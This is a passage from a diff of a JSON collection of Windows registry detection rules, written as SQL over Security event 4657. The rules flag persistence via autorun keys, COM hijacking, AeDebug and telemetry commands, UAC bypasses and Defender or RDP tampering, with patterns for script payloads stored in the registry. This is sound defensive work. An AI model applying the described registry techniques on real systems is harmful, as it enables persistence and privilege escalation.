'\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1053.005" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_aedebug_persistence.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", - "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" - }, - { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Classes Autorun Keys Modification", - "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE 